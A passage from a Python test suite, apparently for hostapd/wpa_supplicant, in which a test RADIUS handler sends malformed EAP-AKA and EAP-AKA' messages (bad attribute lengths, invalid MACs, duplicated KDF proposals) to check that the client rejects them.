EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with BIDDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_BIDDING, 1, 0x8000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but no MAC")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but invalid MAC value")
return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success with zero-key MAC")
return struct.pack(">BBHBBHBBHBBH16B", EAP_CODE_REQUEST,
ctx['id'] - 2,
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0,
0xbe, 0x2e, 0xbb, 0xa9, 0xfa, 0x2e, 0x82, 0x36,
0x37, 0x8c, 0x32, 0x41, 0xb7, 0xc7, 0x58, 0xa3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16384)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16385)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with unrecognized non-failure")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming no identity round was used")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with mismatching Checkcode value")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with Checkcode claimin identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RAND length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RAND, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTN length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTN, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_PADDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PADDING, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NONCE_MT length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_MT, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_MAC length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_MAC, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NOTIFICATION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NOTIFICATION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AT_IDENTITY overflow")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IDENTITY, 1, 0xffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_SELECTED_VERSION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_SELECTED_VERSION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER_TOO_SMALL")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER_TOO_SMALL, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NONCE_S")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_S, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CLIENT_ERROR_CODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CLIENT_ERROR_CODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_IV length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IV, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_ENCR_DATA length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ENCR_DATA, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_PSEUDONYM")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_PSEUDONYM, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_REAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_REAUTH_ID, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 6, 0xffff, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTS length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTS, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CHECKCODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CHECKCODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RESULT_IND length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RESULT_IND, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF_INPUT")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF_INPUT, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_BIDDING length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_BIDDING, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(aka_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 49):
eap = "AKA AKA'" if i == 11 else "AKA"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap=eap, identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0, 15 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_aka_prime(dev, apdev):
"""EAP-AKA' protocol tests"""
def aka_prime_handler(ctx, req):
logger.info("aka_prime_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_AKA_PRIME)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with empty AT_KDF_INPUT")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with AT_KDF_INPUT")
return struct.pack(">BBHBBHBBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with duplicated KDF")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 2,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with incorrect KDF selected")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with selected KDF not duplicated")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with selected KDF duplicated (missing MAC, RAND, AUTN)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple unsupported KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 2 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with invalid MAC, RAND, AUTN values)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_AUTN, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - AMF separation bit not set)")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
